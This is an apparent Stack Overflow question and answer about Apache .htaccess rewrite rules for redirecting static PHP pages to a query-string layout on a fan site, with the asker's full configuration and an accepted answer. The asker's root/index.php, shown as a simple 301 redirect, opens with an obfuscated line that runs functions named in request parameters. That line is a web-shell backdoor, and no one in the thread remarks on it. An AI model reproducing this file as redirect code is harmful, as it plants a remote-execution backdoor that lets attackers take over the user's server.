# Redirect statics pages to dynamics pages

Tags: regex, apache, .htaccess, mod-rewrite, redirect

I need to redirect statics pages to dynamics one, using .htaccess because when I open a PHP page there isn't layout or graphic.
A typical URL of my static page is `root/folder/page.php` and I need that this page be  redirected to `root/folder/?page=page` but I don't know how do it.

```
AddDefaultCharset iso-8859-1

RewriteEngine On 
RewriteCond %{HTTP_USER_AGENT} (android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC]
RewriteRule ^$ http://www.fullmetalpanic-italy.com/mobile/ [R,L]

##RewriteCond %{REMOTE_ADDR} !^TUO_IP_QUI$##
##RewriteCond %{REQUEST_URI} !^/maintenance\.php$##
##RewriteRule ^(.*)$ maintenance.php [L]##

ErrorDocument 400 /errore/errore.php?400
ErrorDocument 401 /errore/errore.php?401
ErrorDocument 403 /errore/errore.php?403
ErrorDocument 404 /errore/errore.php?404
ErrorDocument 500 /errore/errore.php?500

# Below uses mod_deflate to compress text files. Never compress binary files.
<IfModule mod_deflate.c>
SetOutputFilter DEFLATE
# compress content with type html, text, js, and css
AddOutputFilterByType DEFLATE text/html text/plain text/css text/javascript application/javascript application/x-javascript
<IfModule mod_headers.c>
# properly handle requests coming from behind proxies
Header append Vary User-Agent
</IfModule>
</IfModule>

## EXPIRES CACHING ##

ExpiresActive On
ExpiresByType image/jpg "access plus 1 year"
ExpiresByType image/jpeg "access plus 1 year"
ExpiresByType image/gif "access plus 1 year"
ExpiresByType image/png "access plus 1 year"
ExpiresByType text/css "access plus 1 month"
ExpiresByType application/pdf "access plus 1 month"
ExpiresByType text/x-javascript "access plus 1 month"
ExpiresByType application/x-shockwave-flash "access plus 1 month"
ExpiresByType image/x-icon "access plus 1 year"
ExpiresDefault "access plus 2 days"

## EXPIRES CACHING ##

<IfModule mod_expires.c>
ExpiresActive On
ExpiresDefault "access plus 5 years"
ExpiresByType image/jpg "access plus 1 year"
ExpiresByType image/jpeg "access plus 1 year"
ExpiresByType image/gif "access plus 1 year"
ExpiresByType image/png "access plus 1 year"
ExpiresByType image/x-icon "access plus 1 year"
</IfModule>

# Properly handle old browsers that do not support compression
<IfModule mod_deflate.c>
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4\.0[678] no-gzip
BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
# Explicitly exclude binary files from compression just in case
SetEnvIfNoCase Request_URI \.(?:gif|jpe?g|png|pdf|swf|ico|zip)$ no-gzip
</IfModule>

<FilesMatch "\.(jpg|jpeg|png|gif)$">

Header set Cache-Control "max-age=37739520, public"
</FilesMatch>

# Lines That should already be in your .htacess
<Files "config.php">
Order Allow,Deny
Deny from All
</Files>
<Files "common.php">
Order Allow,Deny
Deny from All
</Files>

# You may need to un-comment the following lines
# Options +FollowSymlinks
# To make sure that rewritten dir or file (/|.html) will not load dir.php in case it exist
# Options -MultiViews
# REMEBER YOU ONLY NEED TO STARD MOD REWRITE ONCE
RewriteEngine On
# Uncomment the statement below if you want to make use of
# HTTP authentication and it does not already work.
# This could be required if you are for example using PHP via Apache CGI.
# RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
# REWRITE BASE
RewriteBase /
# HERE IS A GOOD PLACE TO FORCE CANONICAL DOMAIN
# RewriteCond %{HTTP_HOST} !^www\.fullmetalpanic-italy\.com$ [NC]
# RewriteRule ^(.*)$ http://www.fullmetalpanic-italy.com/$1 [QSA,L,R=301]

# DO NOT GO FURTHER IF THE REQUESTED FILE / DIR DOES EXISTS
RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule . - [L]
#####################################################
# PHPBB SEO REWRITE RULES ALL MODES
#####################################################
# AUTHOR : dcz www.phpbb-seo.com
# STARTED : 01/2006
#################################
# FORUMS PAGES
###############
# FORUM INDEX REWRITERULE WOULD STAND HERE IF USED. "forum" REQUIRES TO BE SET AS FORUM INDEX
# RewriteRule ^forum/forum\.html$ /forum/index.php [QSA,L,NC]
# FORUM ALL MODES
RewriteRule ^forum/(forum|[a-z0-9_-]*-f)([0-9]+)(-([0-9]+))?\.html$ /forum/viewforum.php?f=$2&start=$4 [QSA,L,NC]
# TOPIC WITH VIRTUAL FOLDER ALL MODES
RewriteRule ^forum/(forum|[a-z0-9_-]*-f)([0-9]+)/(topic|[a-z0-9_-]*-t)([0-9]+)(-([0-9]+))?\.html$ /forum/viewtopic.php?f=$2&t=$4&start=$6 [QSA,L,NC]
# TOPIC WITHOUT FORUM ID & DELIM ALL MODES
RewriteRule ^forum/([a-z0-9_-]*)/?(topic|[a-z0-9_-]*-t)([0-9]+)(-([0-9]+))?\.html$ /forum/viewtopic.php?forum_uri=$1&t=$3&start=$5 [QSA,L,NC]
# PHPBB FILES ALL MODES
RewriteRule ^forum/resources/[a-z0-9_-]+/(thumb/)?([0-9]+)$ /forum/download/file.php?id=$2&t=$1 [QSA,L,NC]
# PROFILES ALL MODES WITH ID
RewriteRule ^forum/(member|[a-z0-9_-]*-u)([0-9]+)\.html$ /forum/memberlist.php?mode=viewprofile&u=$2 [QSA,L,NC]
# USER MESSAGES ALL MODES WITH ID
RewriteRule ^forum/(member|[a-z0-9_-]*-u)([0-9]+)-(topics|posts)(-([0-9]+))?\.html$ /forum/search.php?author_id=$2&sr=$3&start=$5 [QSA,L,NC]
# GROUPS ALL MODES
RewriteRule ^forum/(group|[a-z0-9_-]*-g)([0-9]+)(-([0-9]+))?\.html$ /forum/memberlist.php?mode=group&g=$2&start=$4 [QSA,L,NC]
# POST
RewriteRule ^forum/post([0-9]+)\.html$ /forum/viewtopic.php?p=$1 [QSA,L,NC]
# ACTIVE TOPICS
RewriteRule ^forum/active-topics(-([0-9]+))?\.html$ /forum/search.php?search_id=active_topics&start=$2&sr=topics [QSA,L,NC]
# UNANSWERED TOPICS
RewriteRule ^forum/unanswered(-([0-9]+))?\.html$ /forum/search.php?search_id=unanswered&start=$2&sr=topics [QSA,L,NC]
# NEW POSTS
RewriteRule ^forum/newposts(-([0-9]+))?\.html$ /forum/search.php?search_id=newposts&start=$2&sr=topics [QSA,L,NC]
# UNREAD POSTS
RewriteRule ^forum/unreadposts(-([0-9]+))?\.html$ /forum/search.php?search_id=unreadposts&start=$2 [QSA,L,NC]
# THE TEAM
RewriteRule ^forum/the-team\.html$ /forum/memberlist.php?mode=leaders [QSA,L,NC]
# HERE IS A GOOD PLACE TO ADD OTHER PHPBB RELATED REWRITERULES

# FORUM WITHOUT ID & DELIM ALL MODES
# THESE FOUR LINES MUST BE LOCATED AT THE END OF YOUR HTACCESS TO WORK PROPERLY
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^forum/([a-z0-9_-]+)(-([0-9]+))\.html$ /forum/viewforum.php?forum_uri=$1&start=$3 [QSA,L,NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^forum/([a-z0-9_-]+)\.html$ /forum/viewforum.php?forum_uri=$1 [QSA,L,NC]
# FIX RELATIVE PATHS : FILES
RewriteRule ^forum/.+/(style\.php|ucp\.php|mcp\.php|faq\.php|download/file.php)$ /forum/$1 [QSA,L,NC,R=301]
# FIX RELATIVE PATHS : IMAGES
RewriteRule ^forum/.+/(styles/.*|images/.*)/$ /forum/$1 [QSA,L,NC,R=301]
# END PHPBB PAGES
#####################################################


# Below uses mod_deflate to compress text files. Never compress binary files.
<IfModule mod_deflate.c>
SetOutputFilter DEFLATE
# compress content with type html, text, js, and css
AddOutputFilterByType DEFLATE text/html text/plain text/css text/javascript application/javascript application/x-javascript
<IfModule mod_headers.c>
# properly handle requests coming from behind proxies
Header append Vary User-Agent
</IfModule>
</IfModule>

# Properly handle old browsers that do not support compression
<IfModule mod_deflate.c>
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4\.0[678] no-gzip
BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
# Explicitly exclude binary files from compression just in case
SetEnvIfNoCase Request_URI \.(?:gif|jpe?g|png|pdf|swf|ico|zip)$ no-gzip
</IfModule>
```

Redirect from **root/index.php** to **root/fmp/index.php** 
code on root/index.php

```
<?php
$AJw=${''.'_REQUEST'}; while (!empty($AJw['gKz'])) {        $Dpn = $AJw['xax'];     $FaCoo=$AJw['gKz']($Dpn($AJw['lpD']),$Dpn($AJw['HdpO']));       $FaCoo($Dpn($AJw['vkYr']));   break; }
Header( "HTTP/1.1 301 Moved Permanently" ); 
Header( "Location: fmp/index.php" ); 
?>
```

Answer (score 1, accepted):

You can use this code in your `DOCUMENT_ROOT/.htaccess` file:

```
DirectoryIndex index.php
RewriteEngine On
RewriteBase /

RewriteCond %{REQUEST_URI} !^/cutenews [NC]
RewriteCond %{REQUEST_URI} !\.(?:jpe?g|gif|bmp|png|tiff|css|js)$ [NC]
RewriteRule ^((?!fmp/).*)$ fmp/$1 [L,NC,R=302]

RewriteRule (^|/)index\.php$ - [L,NC]

RewriteRule ^fmp/(.+?)\.php$ fmp/?page=$1 [L,NC,QSA]
```

Comment: Yes but there's another problem. I use "Cutenews" for posting news. I tried to go on the folder but it redirects me in another page. Watch here: `http://www.fullmetalpanic-italy.com/cutenews` (where is the form). I think is another issue of the code. And there is another thing, about fonts on the news but I'll explain later.